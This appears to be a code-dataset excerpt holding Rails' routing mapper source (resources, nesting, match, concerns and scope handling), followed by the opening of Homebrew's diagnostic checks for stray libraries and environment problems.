# resources :posts, shallow: true do
# resources :comments
# end
#
# Is the same as:
#
# resources :posts do
# resources :comments, except: [:show, :edit, :update, :destroy]
# end
# resources :comments, only: [:show, :edit, :update, :destroy]
#
# This allows URLs for resources that otherwise would be deeply nested such
# as a comment on a blog post like <tt>/posts/a-long-permalink/comments/1234</tt>
# to be shortened to just <tt>/comments/1234</tt>.
#
# [:shallow_path]
# Prefixes nested shallow routes with the specified path.
#
# scope shallow_path: "sekret" do
# resources :posts do
# resources :comments, shallow: true
# end
# end
#
# The +comments+ resource here will have the following routes generated for it:
#
# post_comments GET /posts/:post_id/comments(.:format)
# post_comments POST /posts/:post_id/comments(.:format)
# new_post_comment GET /posts/:post_id/comments/new(.:format)
# edit_comment GET /sekret/comments/:id/edit(.:format)
# comment GET /sekret/comments/:id(.:format)
# comment PATCH/PUT /sekret/comments/:id(.:format)
# comment DELETE /sekret/comments/:id(.:format)
#
# [:shallow_prefix]
# Prefixes nested shallow route names with specified prefix.
#
# scope shallow_prefix: "sekret" do
# resources :posts do
# resources :comments, shallow: true
# end
# end
#
# The +comments+ resource here will have the following routes generated for it:
#
# post_comments GET /posts/:post_id/comments(.:format)
# post_comments POST /posts/:post_id/comments(.:format)
# new_post_comment GET /posts/:post_id/comments/new(.:format)
# edit_sekret_comment GET /comments/:id/edit(.:format)
# sekret_comment GET /comments/:id(.:format)
# sekret_comment PATCH/PUT /comments/:id(.:format)
# sekret_comment DELETE /comments/:id(.:format)
#
# [:format]
# Allows you to specify the default value for optional +format+
# segment or disable it by supplying +false+.
#
# === Examples
#
# # routes call <tt>Admin::PostsController</tt>
# resources :posts, module: "admin"
#
# # resource actions are at /admin/posts.
# resources :posts, path: "admin/posts"
def resources(*resources, &block)
  options = resources.extract_options!.dup

  # apply_common_behavior_for returns true when it has already recursed
  # (multiple names, :shallow, implicit nesting, or scope options).
  if apply_common_behavior_for(:resources, resources, options, &block)
    return self
  end

  with_scope_level(:resources) do
    options = apply_action_options options
    resource_scope(Resource.new(resources.pop, api_only?, @scope[:shallow], options)) do
      yield if block_given?

      concerns(options[:concerns]) if options[:concerns]

      collection do
        get :index if parent_resource.actions.include?(:index)
        post :create if parent_resource.actions.include?(:create)
      end

      new do
        get :new
      end if parent_resource.actions.include?(:new)

      set_member_mappings_for_resource
    end
  end

  self
end
# To add a route to the collection:
#
# resources :photos do
# collection do
# get 'search'
# end
# end
#
# This will enable Rails to recognize paths such as <tt>/photos/search</tt>
# with GET, and route to the search action of +PhotosController+. It will also
# create the <tt>search_photos_url</tt> and <tt>search_photos_path</tt>
# route helpers.
def collection
  unless resource_scope?
    raise ArgumentError, "can't use collection outside resource(s) scope"
  end

  with_scope_level(:collection) do
    path_scope(parent_resource.collection_scope) do
      yield
    end
  end
end

# To add a member route, add a member block into the resource block:
#
#   resources :photos do
#     member do
#       get 'preview'
#     end
#   end
#
# This will recognize <tt>/photos/1/preview</tt> with GET, and route to the
# preview action of +PhotosController+. It will also create the
# <tt>preview_photo_url</tt> and <tt>preview_photo_path</tt> helpers.
def member
  unless resource_scope?
    raise ArgumentError, "can't use member outside resource(s) scope"
  end

  with_scope_level(:member) do
    if shallow?
      # Shallow member routes drop the parent prefix, e.g. /comments/:id.
      shallow_scope {
        path_scope(parent_resource.member_scope) { yield }
      }
    else
      path_scope(parent_resource.member_scope) { yield }
    end
  end
end

# Routes drawn inside a +new+ block are prefixed with the resource's
# new path, e.g. /photos/new/preview.
def new
  unless resource_scope?
    raise ArgumentError, "can't use new outside resource(s) scope"
  end

  with_scope_level(:new) do
    path_scope(parent_resource.new_scope(action_path(:new))) do
      yield
    end
  end
end

# Nests child routes under the parent resource's scope, e.g.
# /photos/:photo_id/comments; with shallow nesting the deep prefix is
# collapsed once one level of nesting is already present.
def nested
  unless resource_scope?
    raise ArgumentError, "can't use nested outside resource(s) scope"
  end

  with_scope_level(:nested) do
    if shallow? && shallow_nesting_depth >= 1
      shallow_scope do
        path_scope(parent_resource.nested_scope) do
          scope(nested_options) { yield }
        end
      end
    else
      path_scope(parent_resource.nested_scope) do
        scope(nested_options) { yield }
      end
    end
  end
end
# See ActionDispatch::Routing::Mapper::Scoping#namespace.
def namespace(path, options = {})
  # Inside a resource block, a namespace is implicitly nested under it.
  if resource_scope?
    nested { super }
  else
    super
  end
end

# Marks every resource declared inside the block as shallow.
def shallow
  @scope = @scope.new(shallow: true)
  yield
ensure
  @scope = @scope.parent
end

# Singleton resources have no member/collection split, so they never
# participate in shallow routing.
def shallow?
  !parent_resource.singleton? && @scope[:shallow]
end
# Matches a URL pattern to one or more routes.
# For more information, see match[rdoc-ref:Base#match].
#
# match 'path' => 'controller#action', via: :patch
# match 'path', to: 'controller#action', via: :post
# match 'path', 'otherpath', on: :member, via: :get
def match(path, *rest, &block)
  if rest.empty? && Hash === path
    # Shorthand form: match "path" => "controller#action". The String
    # key is the path; its value is the endpoint.
    options = path
    path, to = options.find { |name, _value| name.is_a?(String) }

    raise ArgumentError, "Route path not specified" if path.nil?

    # The endpoint can be a Symbol action, a "controller#action" or bare
    # controller String, or any Rack endpoint (handled by :to).
    case to
    when Symbol
      options[:action] = to
    when String
      if /#/.match?(to)
        options[:to] = to
      else
        options[:controller] = to
      end
    else
      options[:to] = to
    end

    options.delete(path)
    paths = [path]
  else
    options = rest.pop || {}
    paths = [path] + rest
  end

  if options.key?(:defaults)
    defaults(options.delete(:defaults)) { map_match(paths, options, &block) }
  else
    map_match(paths, options, &block)
  end
end
# You can specify what Rails should route "/" to with the root method:
#
# root to: 'pages#main'
#
# For options, see +match+, as +root+ uses it internally.
#
# You can also pass a string which will expand
#
# root 'pages#main'
#
# You should put the root route at the top of <tt>config/routes.rb</tt>,
# because this means it will be matched first. As this is the most popular route
# of most Rails applications, this is beneficial.
def root(path, options = {})
  if path.is_a?(String)
    options[:to] = path
  elsif path.is_a?(Hash) && options.empty?
    options = path
  else
    raise ArgumentError, "must be called with a path and/or options"
  end

  if @scope.resources?
    # root inside a resources block is scoped under the resource path.
    with_scope_level(:root) do
      path_scope(parent_resource.path) do
        match_root_route(options)
      end
    end
  else
    match_root_route(options)
  end
end
private
# The Resource/SingletonResource currently being drawn, if any.
def parent_resource
  @scope[:scope_level_resource]
end
# Behavior shared by +resource+ and +resources+. Returns true when the
# declaration was already handled by recursing (multiple names,
# :shallow, implicit nesting, or resource-level scope options), in
# which case the caller should return immediately.
def apply_common_behavior_for(method, resources, options, &block)
  if resources.length > 1
    resources.each { |r| send(method, r, options, &block) }
    return true
  end

  if options.delete(:shallow)
    shallow do
      send(method, resources.pop, options, &block)
    end
    return true
  end

  if resource_scope?
    # e.g. resources :posts do resources :comments end — implicit nesting.
    nested { send(method, resources.pop, options, &block) }
    return true
  end

  # Bare Regexp options are shorthand for :constraints entries.
  options.keys.each do |k|
    (options[:constraints] ||= {})[k] = options.delete(k) if options[k].is_a?(Regexp)
  end

  scope_options = options.slice!(*RESOURCE_OPTIONS)
  unless scope_options.empty?
    scope(scope_options) do
      send(method, resources.pop, options, &block)
    end
    return true
  end

  false
end
def apply_action_options(options)
return options if action_options? options
options.merge scope_action_options
end
# True when the caller restricted actions via :only or :except.
def action_options?(options)
  options[:only] || options[:except]
end
# Action-limiting options inherited from an enclosing `scope`.
def scope_action_options
  @scope[:action_options] || {}
end
# True inside a `resource`/`resources` block.
def resource_scope?
  @scope.resource_scope?
end
# True inside `collection`, `member` or `new` blocks.
def resource_method_scope?
  @scope.resource_method_scope?
end
# True inside a `nested` block.
def nested_scope?
  @scope.nested?
end
# Pushes a new scope frame at the given level for the duration of the block;
# `ensure` guarantees the frame is popped even if the block raises.
def with_scope_level(kind) # :doc:
  @scope = @scope.new_level(kind)
  yield
ensure
  @scope = @scope.parent
end
# Pushes a scope frame carrying the current resource and evaluates the block
# inside that resource's controller scope; always pops on exit.
def resource_scope(resource)
  @scope = @scope.new(scope_level_resource: resource)
  controller(resource.resource_scope) { yield }
ensure
  @scope = @scope.parent
end
# Options for routes nested under the parent resource: names them after the
# member, and carries the parent's id constraint when one is configured.
def nested_options
  options = { as: parent_resource.member_name }
  options[:constraints] = {
    parent_resource.nested_param => param_constraint
  } if param_constraint?
  options
end
# Number of enclosing resource frames whose resource is declared shallow.
def shallow_nesting_depth
  @scope.count do |node|
    resource = node.frame[:scope_level_resource]
    resource && resource.shallow?
  end
end
# True when a Regexp constraint exists for the parent resource's param.
def param_constraint?
  @scope[:constraints] && @scope[:constraints][parent_resource.param].is_a?(Regexp)
end
# The Regexp constraint for the parent resource's param (call only after
# param_constraint? returned true).
def param_constraint
  @scope[:constraints][parent_resource.param]
end
# CRUD actions (index/create/show/...) get no action segment in their path
# when declared at a resource method scope.
def canonical_action?(action)
  resource_method_scope? && CANONICAL_ACTIONS.include?(action.to_s)
end
# Temporarily rebases :as and :path onto the scope's shallow prefix/path for
# the block; the frame is always popped via `ensure`.
def shallow_scope
  scope = { as: @scope[:shallow_prefix],
            path: @scope[:shallow_path] }
  @scope = @scope.new scope
  yield
ensure
  @scope = @scope.parent
end
# Builds the URL path for +action+: an explicit +path+ wins; canonical CRUD
# actions use the bare scope path; anything else appends the action segment.
def path_for_action(action, path)
  base = @scope[:path]
  return "#{base}/#{path}" if path

  canonical_action?(action) ? base.to_s : "#{base}/#{action_path(action)}"
end
# Path segment for an action, honoring any `path_names` override.
def action_path(name)
  @scope[:path_names][name.to_sym] || name
end
# Picks the helper-name prefix: an explicit :as wins; otherwise non-canonical
# actions use their own name. Returns nil for canonical actions without :as,
# and for blank or "/" prefixes.
def prefix_name_for_action(as, action)
  prefix = as || (action unless canonical_action?(action))
  return unless prefix && prefix != "/" && !prefix.empty?

  Mapper.normalize_name prefix.to_s.tr("-", "_")
end
# Computes the named-route helper name for +action+, combining the scope's
# :as prefix with resource collection/member names. Returns nil when no name
# should be registered (e.g. duplicate or invalid auto-generated names).
def name_for_action(as, action)
  prefix = prefix_name_for_action(as, action)
  name_prefix = @scope[:as]
  if parent_resource
    # Inside a resource block an anonymous custom route gets no name.
    return nil unless as || action
    collection_name = parent_resource.collection_name
    member_name = parent_resource.member_name
  end
  action_name = @scope.action_name(name_prefix, prefix, collection_name, member_name)
  candidate = action_name.select(&:present?).join("_")
  unless candidate.empty?
    # If a name was not explicitly given, we check if it is valid
    # and return nil in case it isn't. Otherwise, we pass the invalid name
    # forward so the underlying router engine treats it and raises an exception.
    if as.nil?
      candidate unless candidate !~ /\A[_a-z]/i || has_named_route?(candidate)
    else
      candidate
    end
  end
end
# Registers the standard member routes (edit/show/update/destroy) for the
# parent resource, honoring its configured action list. :update gets both
# PATCH and PUT for backwards compatibility.
def set_member_mappings_for_resource # :doc:
  member do
    get :edit if parent_resource.actions.include?(:edit)
    get :show if parent_resource.actions.include?(:show)
    if parent_resource.actions.include?(:update)
      patch :update
      put :update
    end
    delete :destroy if parent_resource.actions.include?(:destroy)
  end
end
# Whether the route set belongs to an API-only application.
def api_only? # :doc:
  @set.api_only?
end
# Pushes a scope frame with +path+ merged onto the current path for the
# duration of the block; always popped via `ensure`.
def path_scope(path)
  @scope = @scope.new(path: merge_path_scope(@scope[:path], path))
  yield
ensure
  @scope = @scope.parent
end
# Terminal handler behind `match` and the HTTP-verb helpers. Resolves the
# :to target from scope defaults, normalizes verbs/format/anchor/constraints,
# then registers one route per String path and per Symbol action.
# Returns self so calls can be chained.
def map_match(paths, options)
  if options[:on] && !VALID_ON_OPTIONS.include?(options[:on])
    # BUGFIX: this previously interpolated the undefined local `on`, which
    # raised NameError instead of the intended ArgumentError. Report the
    # offending option value itself.
    raise ArgumentError, "Unknown scope #{options[:on].inspect} given to :on"
  end

  # Inherit a target from the enclosing scope when none is given.
  if @scope[:to]
    options[:to] ||= @scope[:to]
  end

  if @scope[:controller] && @scope[:action]
    options[:to] ||= "#{@scope[:controller]}##{@scope[:action]}"
  end

  controller = options.delete(:controller) || @scope[:controller]
  option_path = options.delete :path
  to = options.delete :to
  via = Mapping.check_via Array(options.delete(:via) {
    @scope[:via]
  })
  formatted = options.delete(:format) { @scope[:format] }
  anchor = options.delete(:anchor) { true }
  options_constraints = options.delete(:constraints) || {}

  path_types = paths.group_by(&:class)
  # String paths: each may imply its own controller#action shorthand.
  path_types.fetch(String, []).each do |_path|
    route_options = options.dup
    if _path && option_path
      raise ArgumentError, "Ambiguous route definition. Both :path and the route path were specified as strings."
    end
    to = get_to_from_path(_path, to, route_options[:action])
    decomposed_match(_path, controller, route_options, _path, to, via, formatted, anchor, options_constraints)
  end
  # Symbol paths name an action directly and reuse the shared :path option.
  path_types.fetch(Symbol, []).each do |action|
    route_options = options.dup
    decomposed_match(action, controller, route_options, option_path, to, via, formatted, anchor, options_constraints)
  end

  self
end
# Derives a "controller#action" target from a shorthand path such as
# "/admin/users" (=> "admin#users") when neither :to nor :action was given.
# Returns the explicit +to+ untouched when one exists, nil when the path is
# not in shorthand form. Dashes are normalized to underscores.
def get_to_from_path(path, to, action)
  return to if to || action

  stripped = path.sub(/\(\.:format\)$/, "")
  return nil unless using_match_shorthand?(stripped)

  stripped.gsub(%r{^/}, "").sub(%r{/([^/]*)$}, '#\1').tr("-", "_")
end

# A shorthand path is word-ish segments separated by slashes, e.g. "a/b/c".
def using_match_shorthand?(path)
  path =~ %r{^/?[-\w]+/[-\w/]+$}
end
# Routes a single match to the right scope: an :on option re-dispatches into
# that scope block (member/collection/new); inside `resources`/`resource`
# blocks custom routes are implicitly nested/member; otherwise the route is
# added directly.
def decomposed_match(path, controller, options, _path, to, via, formatted, anchor, options_constraints)
  if on = options.delete(:on)
    send(on) { decomposed_match(path, controller, options, _path, to, via, formatted, anchor, options_constraints) }
  else
    case @scope.scope_level
    when :resources
      nested { decomposed_match(path, controller, options, _path, to, via, formatted, anchor, options_constraints) }
    when :resource
      member { decomposed_match(path, controller, options, _path, to, via, formatted, anchor, options_constraints) }
    else
      add_route(path, controller, options, _path, to, via, formatted, anchor, options_constraints)
    end
  end
end
# Final registration step: computes the full path and helper name, builds a
# Mapping for the route, and adds it to the route set.
def add_route(action, controller, options, _path, to, via, formatted, anchor, options_constraints)
  path = path_for_action(action, _path)
  raise ArgumentError, "path is required" if path.blank?
  action = action.to_s
  default_action = options.delete(:action) || @scope[:action]
  # Only simple word-ish actions become default actions; "/"-containing
  # actions are path fragments, anything else is discarded as an action name.
  if /^[\w\-\/]+$/.match?(action)
    default_action ||= action.tr("-", "_") unless action.include?("/")
  else
    action = nil
  end
  # `as: nil/false` suppresses the named helper entirely.
  as = if !options.fetch(:as, true) # if it's set to nil or false
    options.delete(:as)
  else
    name_for_action(options.delete(:as), action)
  end
  path = Mapping.normalize_path URI.parser.escape(path), formatted
  ast = Journey::Parser.parse path
  mapping = Mapping.build(@scope, @set, ast, controller, default_action, to, via, formatted, options_constraints, anchor, options)
  @set.add_route(mapping, as)
end
# Registers "/" as a GET route named :root, unless a :root helper already
# exists (e.g. a nested root was declared first).
def match_root_route(options)
  name = has_named_route?(name_for_action(:root, nil)) ? nil : :root
  args = ["/", { as: name, via: :get }.merge!(options)]
  match(*args)
end
end
# Routing Concerns allow you to declare common routes that can be reused
# inside other resources and routes.
#
# concern :commentable do
# resources :comments
# end
#
# concern :image_attachable do
# resources :images, only: :index
# end
#
# These concerns are used in Resources routing:
#
# resources :messages, concerns: [:commentable, :image_attachable]
#
# or in a scope or namespace:
#
# namespace :posts do
# concerns :commentable
# end
module Concerns
# Define a routing concern using a name.
#
# Concerns may be defined inline, using a block, or handled by
# another object, by passing that object as the second parameter.
#
# The concern object, if supplied, should respond to <tt>call</tt>,
# which will receive two parameters:
#
# * The current mapper
# * A hash of options which the concern object may use
#
# Options may also be used by concerns defined in a block by accepting
# a block parameter. So, using a block, you might do something as
# simple as limit the actions available on certain resources, passing
# standard resource options through the concern:
#
# concern :commentable do |options|
# resources :comments, options
# end
#
# resources :posts, concerns: :commentable
# resources :archived_posts do
# # Don't allow comments on archived posts
# concerns :commentable, only: [:index, :show]
# end
#
# Or, using a callable object, you might implement something more
# specific to your application, which would be out of place in your
# routes file.
#
# # purchasable.rb
# class Purchasable
# def initialize(defaults = {})
# @defaults = defaults
# end
#
# def call(mapper, options = {})
# options = @defaults.merge(options)
# mapper.resources :purchases
# mapper.resources :receipts
# mapper.resources :returns if options[:returnable]
# end
# end
#
# # routes.rb
# concern :purchasable, Purchasable.new(returnable: true)
#
# resources :toys, concerns: :purchasable
# resources :electronics, concerns: :purchasable
# resources :pets do
# concerns :purchasable, returnable: false
# end
#
# Any routing helpers can be used inside a concern. If using a
# callable, they're accessible from the Mapper that's passed to
# <tt>call</tt>.
def concern(name, callable = nil, &block)
  # A block-defined concern is wrapped so it runs in the mapper's context
  # with the options passed at use time.
  callable ||= lambda { |mapper, options| mapper.instance_exec(options, &block) }
  @concerns[name] = callable
end
# Use the named concerns
#
# resources :posts do
# concerns :commentable
# end
#
# Concerns also work in any routes helper that you want to use:
#
# namespace :posts do
# concerns :commentable
# end
def concerns(*args)
  options = args.extract_options!
  args.flatten.each do |name|
    # Look up each registered concern and invoke it against this mapper,
    # forwarding any trailing options.
    if concern = @concerns[name]
      concern.call(self, options)
    else
      raise ArgumentError, "No concern named #{name} was found!"
    end
  end
end
end
module CustomUrls
# Define custom URL helpers that will be added to the application's
# routes. This allows you to override and/or replace the default behavior
# of routing helpers, e.g:
#
# direct :homepage do
# "http://www.rubyonrails.org"
# end
#
# direct :commentable do |model|
# [ model, anchor: model.dom_id ]
# end
#
# direct :main do
# { controller: "pages", action: "index", subdomain: "www" }
# end
#
# The return value from the block passed to +direct+ must be a valid set of
# arguments for +url_for+ which will actually build the URL string. This can
# be one of the following:
#
# * A string, which is treated as a generated URL
# * A hash, e.g. <tt>{ controller: "pages", action: "index" }</tt>
# * An array, which is passed to +polymorphic_url+
# * An Active Model instance
# * An Active Model class
#
# NOTE: Other URL helpers can be called in the block but be careful not to invoke
# your custom URL helper again otherwise it will result in a stack overflow error.
#
# You can also specify default options that will be passed through to
# your URL helper definition, e.g:
#
# direct :browse, page: 1, size: 10 do |options|
# [ :products, options.merge(params.permit(:page, :size).to_h.symbolize_keys) ]
# end
#
# In this instance the +params+ object comes from the context in which the
# block is executed, e.g. generating a URL inside a controller action or a view.
# If the block is executed where there isn't a +params+ object such as this:
#
# Rails.application.routes.url_helpers.browse_path
#
# then it will raise a +NameError+. Because of this you need to be aware of the
# context in which you will use your custom URL helper when defining it.
#
# NOTE: The +direct+ method can't be used inside of a scope block such as
# +namespace+ or +scope+ and will raise an error if it detects that it is.
def direct(name, options = {}, &block)
  # Custom URL helpers are only valid at the routes file's top level.
  unless @scope.root?
    raise RuntimeError, "The direct method can't be used inside a routes scope block"
  end
  @set.add_url_helper(name, options, &block)
end
# Define custom polymorphic mappings of models to URLs. This alters the
# behavior of +polymorphic_url+ and consequently the behavior of
# +link_to+ and +form_for+ when passed a model instance, e.g:
#
# resource :basket
#
# resolve "Basket" do
# [:basket]
# end
#
# This will now generate "/basket" when a +Basket+ instance is passed to
# +link_to+ or +form_for+ instead of the standard "/baskets/:id".
#
# NOTE: This custom behavior only applies to simple polymorphic URLs where
# a single model instance is passed and not more complicated forms, e.g:
#
# # config/routes.rb
# resource :profile
# namespace :admin do
# resources :users
# end
#
# resolve("User") { [:profile] }
#
# # app/views/application/_menu.html.erb
# link_to "Profile", @current_user
# link_to "Profile", [:admin, @current_user]
#
# The first +link_to+ will generate "/profile" but the second will generate
# the standard polymorphic URL of "/admin/users/1".
#
# You can pass options to a polymorphic mapping - the arity for the block
# needs to be two as the instance is passed as the first argument, e.g:
#
# resolve "Basket", anchor: "items" do |basket, options|
# [:basket, options]
# end
#
# This generates the URL "/basket#items" because when the last item in an
# array passed to +polymorphic_url+ is a hash then it's treated as options
# to the URL helper that gets called.
#
# NOTE: The +resolve+ method can't be used inside of a scope block such as
# +namespace+ or +scope+ and will raise an error if it detects that it is.
def resolve(*args, &block)
  # Polymorphic mappings are only valid at the routes file's top level.
  unless @scope.root?
    raise RuntimeError, "The resolve method can't be used inside a routes scope block"
  end
  options = args.extract_options!
  args = args.flatten(1)
  # Register the mapping once per model class/name given.
  args.each do |klass|
    @set.add_polymorphic_mapping(klass, options, &block)
  end
end
end
# Immutable linked list of scope frames. Each nested `scope`/`namespace`/
# `resources` block pushes a new Scope whose +parent+ is the previous one;
# option lookup ([]) walks up the chain to the NULL sentinel.
class Scope # :nodoc:
  OPTIONS = [:path, :shallow_path, :as, :shallow_prefix, :module,
             :controller, :action, :path_names, :constraints,
             :shallow, :blocks, :defaults, :via, :format, :options, :to]
  RESOURCE_SCOPES = [:resource, :resources]
  RESOURCE_METHOD_SCOPES = [:collection, :member, :new]
  attr_reader :parent, :scope_level
  def initialize(hash, parent = NULL, scope_level = nil)
    @hash = hash
    @parent = parent
    @scope_level = scope_level
  end
  def nested?
    scope_level == :nested
  end
  def null?
    @hash.nil? && @parent.nil?
  end
  def root?
    @parent.null?
  end
  def resources?
    scope_level == :resources
  end
  def resource_method_scope?
    RESOURCE_METHOD_SCOPES.include? scope_level
  end
  # Orders the helper-name fragments appropriately for the current level;
  # name_for_action joins the present ones with "_".
  def action_name(name_prefix, prefix, collection_name, member_name)
    case scope_level
    when :nested
      [name_prefix, prefix]
    when :collection
      [prefix, name_prefix, collection_name]
    when :new
      [prefix, :new, name_prefix, member_name]
    when :member
      [prefix, name_prefix, member_name]
    when :root
      [name_prefix, collection_name, prefix]
    else
      [name_prefix, member_name, prefix]
    end
  end
  def resource_scope?
    RESOURCE_SCOPES.include? scope_level
  end
  def options
    OPTIONS
  end
  # New child frame at the same level (for option overrides).
  def new(hash)
    self.class.new hash, self, scope_level
  end
  # New child frame reusing this frame's hash but at a different level.
  def new_level(level)
    self.class.new(frame, self, level)
  end
  # Walks up the chain and returns the first frame value for +key+.
  def [](key)
    scope = find { |node| node.frame.key? key }
    scope && scope.frame[key]
  end
  include Enumerable
  # Yields each frame from innermost to outermost, stopping at NULL.
  def each
    node = self
    until node.equal? NULL
      yield node
      node = node.parent
    end
  end
  def frame; @hash; end
  # Chain terminator shared by all scopes.
  NULL = Scope.new(nil, nil)
end
# Binds the mapper to a route set and seeds the root scope with the set's
# resource path-name overrides.
def initialize(set) #:nodoc:
  @set = set
  @scope = Scope.new(path_names: @set.resources_path_names)
  @concerns = {}
end
include Base
include HttpHelpers
include Redirection
include Scoping
include Concerns
include Resources
include CustomUrls
end
end
end
| 34.419312 | 175 | 0.538283 |
ff7bf3e86362c5c07ca9a8d511ecf5b12bee9788 | 39,955 | require "keg"
require "language/python"
require "formula"
require "tempfile"
require "version"
require "development_tools"
require "utils/shell"
module Homebrew
module Diagnostic
# Maps each formula's full name to its missing dependencies, skipping
# formulae with none. When a block is given it is also called with
# (full_name, missing_dependencies) for each affected formula.
def self.missing_deps(ff, hide = nil)
  ff.each_with_object({}) do |formula, acc|
    deps = formula.missing_dependencies(hide: hide)
    next if deps.empty?
    yield formula.full_name, deps if block_given?
    acc[formula.full_name] = deps
  end
end
# Enumerates mounted volumes via `df -P` and answers which volume a given
# path lives on, so checks can detect cross-volume setups.
class Volumes
  def initialize
    @volumes = get_mounts
  end
  # Index of the volume containing +path+ within the full mount list,
  # or -1 when it cannot be determined.
  def which(path)
    vols = get_mounts path
    # no volume found
    return -1 if vols.empty?
    vol_index = @volumes.index(vols[0])
    # volume not found in volume list
    return -1 if vol_index.nil?
    vol_index
  end
  # Mount points reported by `df -P`; restricted to +path+'s volume when
  # a path is given, all volumes otherwise.
  def get_mounts(path = nil)
    vols = []
    # get the volume of path, if path is nil returns all volumes
    args = %w[/bin/df -P]
    args << path if path
    Utils.popen_read(*args) do |io|
      io.each_line do |line|
        case line.chomp
        # regex matches: /dev/disk0s2 489562928 440803616 48247312 91% /
        when /^.+\s+[0-9]+\s+[0-9]+\s+[0-9]+\s+[0-9]{1,3}%\s+(.+)/
          vols << $1
        end
      end
    end
    vols
  end
end
class Checks
############# HELPERS
# Finds files in HOMEBREW_PREFIX *and* /usr/local.
# Specify paths relative to a prefix eg. "include/foo.h".
# Sets @found for your convenience.
# Finds files in HOMEBREW_PREFIX *and* /usr/local.
# Specify paths relative to a prefix eg. "include/foo.h".
# Sets @found for your convenience.
def find_relative_paths(*relative_paths)
  prefixes = [HOMEBREW_PREFIX, "/usr/local"].uniq
  candidates = prefixes.flat_map do |prefix|
    relative_paths.map { |rel| File.join(prefix, rel) }
  end
  @found = candidates.select { |path| File.exist?(path) }
end
# Appends each entry of +list+ as an indented line onto +string+ (mutating
# it in place) and returns the string.
def inject_file_list(list, string)
  list.each_with_object(string) { |elem, acc| acc << " #{elem}\n" }
end
############# END HELPERS
# Names of checks that validate the developer toolchain.
def development_tools_checks
  %w[
    check_for_installed_developer_tools
  ].freeze
end
# Toolchain checks considered fatal (none on generic platforms).
def fatal_development_tools_checks
  %w[
  ].freeze
end
# Checks to run when diagnosing a build failure.
def build_error_checks
  (development_tools_checks + %w[
  ]).freeze
end
# Warns when no compiler toolchain is present; nil when all is well.
def check_for_installed_developer_tools
  return if DevelopmentTools.installed?
  <<-EOS.undent
    No developer tools installed.
    #{DevelopmentTools.installation_instructions}
  EOS
end
# See https://github.com/Homebrew/legacy-homebrew/pull/9986
# See https://github.com/Homebrew/legacy-homebrew/pull/9986
# Flags PATH entries ending in "/" which confuse other doctor checks.
def check_path_for_trailing_slashes
  bad_paths = PATH.new(ENV["HOMEBREW_PATH"]).select { |p| p.end_with?("/") }
  return if bad_paths.empty?
  inject_file_list bad_paths, <<-EOS.undent
    Some directories in your path end in a slash.
    Directories in your path should not end in a slash. This can break other
    doctor checks. The following directories should be edited:
  EOS
end
# Anaconda installs multiple system & brew dupes, including OpenSSL, Python,
# sqlite, libpng, Qt, etc. Regularly breaks compile on Vim, MacVim and others.
# Is flagged as part of the *-config script checks below, but people seem
# to ignore those as warnings rather than extremely likely breakage.
# Anaconda installs multiple system & brew dupes, including OpenSSL, Python,
# sqlite, libpng, Qt, etc. Regularly breaks compile on Vim, MacVim and others.
# Is flagged as part of the *-config script checks below, but people seem
# to ignore those as warnings rather than extremely likely breakage.
def check_for_anaconda
  return unless which("anaconda")
  return unless which("python")
  anaconda_directory = which("anaconda").realpath.dirname
  # Ask the python on PATH where its executable really lives.
  python_binary = Utils.popen_read(which("python"), "-c", "import sys; sys.stdout.write(sys.executable)")
  python_directory = Pathname.new(python_binary).realpath.dirname
  # Only warn if Python lives with Anaconda, since is most problematic case.
  return unless python_directory == anaconda_directory
  <<-EOS.undent
    Anaconda is known to frequently break Homebrew builds, including Vim and
    MacVim, due to bundling many duplicates of system and Homebrew-available
    tools.
    If you encounter a build failure please temporarily remove Anaconda
    from your $PATH and attempt the build again prior to reporting the
    failure to us. Thanks!
  EOS
end
# Scans +dir+ for regular files matching +pattern+ that are not covered by
# +white_list+ globs, and returns +message+ with the offenders appended.
# Returns nil when the directory is absent or nothing stray is found.
def __check_stray_files(dir, pattern, white_list, message)
  return unless File.directory?(dir)

  relative = Dir.chdir(dir) do
    matches = Dir[pattern].select { |f| File.file?(f) && !File.symlink?(f) }
    matches - Dir.glob(white_list)
  end
  stray = relative.map { |f| File.join(dir, f) }
  inject_file_list(stray, message) unless stray.empty?
end
# Warns about non-Homebrew dylibs in /usr/local/lib.
def check_for_stray_dylibs
  # Dylibs which are generally OK should be added to this list,
  # with a short description of the software they come with.
  white_list = [
    "libfuse.2.dylib", # MacFuse
    "libfuse_ino64.2.dylib", # MacFuse
    "libmacfuse_i32.2.dylib", # OSXFuse MacFuse compatibility layer
    "libmacfuse_i64.2.dylib", # OSXFuse MacFuse compatibility layer
    "libosxfuse_i32.2.dylib", # OSXFuse
    "libosxfuse_i64.2.dylib", # OSXFuse
    "libosxfuse.2.dylib", # OSXFuse
    "libTrAPI.dylib", # TrAPI/Endpoint Security VPN
    "libntfs-3g.*.dylib", # NTFS-3G
    "libntfs.*.dylib", # NTFS-3G
    "libublio.*.dylib", # NTFS-3G
    "libUFSDNTFS.dylib", # Paragon NTFS
    "libUFSDExtFS.dylib", # Paragon ExtFS
    "libecomlodr.dylib", # Symantec Endpoint Protection
    "libsymsea.*.dylib", # Symantec Endpoint Protection
    "sentinel.dylib", # SentinelOne
  ]
  __check_stray_files "/usr/local/lib", "*.dylib", white_list, <<-EOS.undent
    Unbrewed dylibs were found in /usr/local/lib.
    If you didn't put them there on purpose they could cause problems when
    building Homebrew formulae, and may need to be deleted.
    Unexpected dylibs:
  EOS
end
# Warns about non-Homebrew static archives in /usr/local/lib.
def check_for_stray_static_libs
  # Static libs which are generally OK should be added to this list,
  # with a short description of the software they come with.
  white_list = [
    "libsecurity_agent_client.a", # OS X 10.8.2 Supplemental Update
    "libsecurity_agent_server.a", # OS X 10.8.2 Supplemental Update
    "libntfs-3g.a", # NTFS-3G
    "libntfs.a", # NTFS-3G
    "libublio.a", # NTFS-3G
    "libappfirewall.a", # Symantec Endpoint Protection
    "libautoblock.a", # Symantec Endpoint Protection
    "libautosetup.a", # Symantec Endpoint Protection
    "libconnectionsclient.a", # Symantec Endpoint Protection
    "liblocationawareness.a", # Symantec Endpoint Protection
    "libpersonalfirewall.a", # Symantec Endpoint Protection
    "libtrustedcomponents.a", # Symantec Endpoint Protection
  ]
  __check_stray_files "/usr/local/lib", "*.a", white_list, <<-EOS.undent
    Unbrewed static libraries were found in /usr/local/lib.
    If you didn't put them there on purpose they could cause problems when
    building Homebrew formulae, and may need to be deleted.
    Unexpected static libraries:
  EOS
end
# Warns about non-Homebrew pkg-config files in /usr/local/lib/pkgconfig.
def check_for_stray_pcs
  # Package-config files which are generally OK should be added to this list,
  # with a short description of the software they come with.
  white_list = [
    "fuse.pc", # OSXFuse/MacFuse
